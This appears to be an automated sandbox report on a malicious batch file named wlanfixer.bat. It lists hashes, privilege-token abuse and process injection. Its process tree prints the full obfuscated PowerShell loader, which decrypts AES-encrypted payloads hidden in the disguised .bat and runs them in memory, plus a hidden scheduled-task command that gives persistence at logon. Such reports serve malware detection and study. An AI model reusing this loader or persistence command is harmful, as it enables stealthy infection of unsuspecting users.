Analysis
-
max time kernel
132s -
max time network
138s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
23-04-2024 13:04
Static task
static1
Behavioral task
behavioral1
Sample
wlanfixer.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
wlanfixer.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
wlanfixer.bat
Resource
win10v2004-20240412-en
General
-
Target
wlanfixer.bat
-
Size
3.5MB
-
MD5
45730c9d81cdc2677ea2bd082eb79edb
-
SHA1
7ece7b975ab6506d83dac94f685e2cedbe56dd6b
-
SHA256
31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4
-
SHA512
d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687
-
SSDEEP
49152:mR8s3zr/pxAN80OHguszxrEC/agxlnUrLvlKNNwI:d
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5068 powershell.exe 5068 powershell.exe 5068 powershell.exe 3464 powershell.exe 3464 powershell.exe 3464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5068 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeIncreaseQuotaPrivilege 3464 powershell.exe Token: SeSecurityPrivilege 3464 powershell.exe Token: SeTakeOwnershipPrivilege 3464 powershell.exe Token: SeLoadDriverPrivilege 3464 powershell.exe Token: SeSystemProfilePrivilege 3464 powershell.exe Token: SeSystemtimePrivilege 3464 powershell.exe Token: SeProfSingleProcessPrivilege 3464 powershell.exe Token: SeIncBasePriorityPrivilege 3464 powershell.exe Token: SeCreatePagefilePrivilege 3464 powershell.exe Token: SeBackupPrivilege 3464 powershell.exe Token: SeRestorePrivilege 3464 powershell.exe Token: SeShutdownPrivilege 3464 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeSystemEnvironmentPrivilege 3464 powershell.exe Token: SeRemoteShutdownPrivilege 3464 powershell.exe Token: SeUndockPrivilege 3464 powershell.exe Token: SeManageVolumePrivilege 3464 powershell.exe Token: 33 3464 powershell.exe Token: 34 3464 powershell.exe Token: 35 3464 powershell.exe Token: 36 3464 powershell.exe Token: SeIncreaseQuotaPrivilege 3464 powershell.exe Token: SeSecurityPrivilege 3464 powershell.exe Token: SeTakeOwnershipPrivilege 3464 powershell.exe Token: SeLoadDriverPrivilege 3464 powershell.exe Token: SeSystemProfilePrivilege 3464 powershell.exe Token: SeSystemtimePrivilege 3464 powershell.exe Token: SeProfSingleProcessPrivilege 3464 powershell.exe Token: SeIncBasePriorityPrivilege 3464 powershell.exe Token: SeCreatePagefilePrivilege 3464 powershell.exe Token: SeBackupPrivilege 3464 powershell.exe Token: SeRestorePrivilege 3464 powershell.exe Token: SeShutdownPrivilege 3464 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeSystemEnvironmentPrivilege 3464 powershell.exe Token: SeRemoteShutdownPrivilege 3464 powershell.exe Token: SeUndockPrivilege 3464 powershell.exe Token: SeManageVolumePrivilege 3464 powershell.exe Token: 33 3464 powershell.exe Token: 34 3464 powershell.exe Token: 35 3464 powershell.exe Token: 36 3464 powershell.exe Token: SeIncreaseQuotaPrivilege 3464 powershell.exe Token: SeSecurityPrivilege 3464 powershell.exe Token: SeTakeOwnershipPrivilege 3464 powershell.exe Token: SeLoadDriverPrivilege 3464 powershell.exe Token: SeSystemProfilePrivilege 3464 powershell.exe Token: SeSystemtimePrivilege 3464 powershell.exe Token: SeProfSingleProcessPrivilege 3464 powershell.exe Token: SeIncBasePriorityPrivilege 3464 powershell.exe Token: SeCreatePagefilePrivilege 3464 powershell.exe Token: SeBackupPrivilege 3464 powershell.exe Token: SeRestorePrivilege 3464 powershell.exe Token: SeShutdownPrivilege 3464 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeSystemEnvironmentPrivilege 3464 powershell.exe Token: SeRemoteShutdownPrivilege 3464 powershell.exe Token: SeUndockPrivilege 3464 powershell.exe Token: SeManageVolumePrivilege 3464 powershell.exe Token: 33 3464 powershell.exe Token: 34 3464 powershell.exe Token: 35 3464 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2156 wrote to memory of 5068 2156 cmd.exe 75 PID 2156 wrote to memory of 5068 2156 cmd.exe 75 PID 5068 wrote to memory of 3464 5068 powershell.exe 76 PID 5068 wrote to memory of 3464 5068 powershell.exe 76
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_268_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_268.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a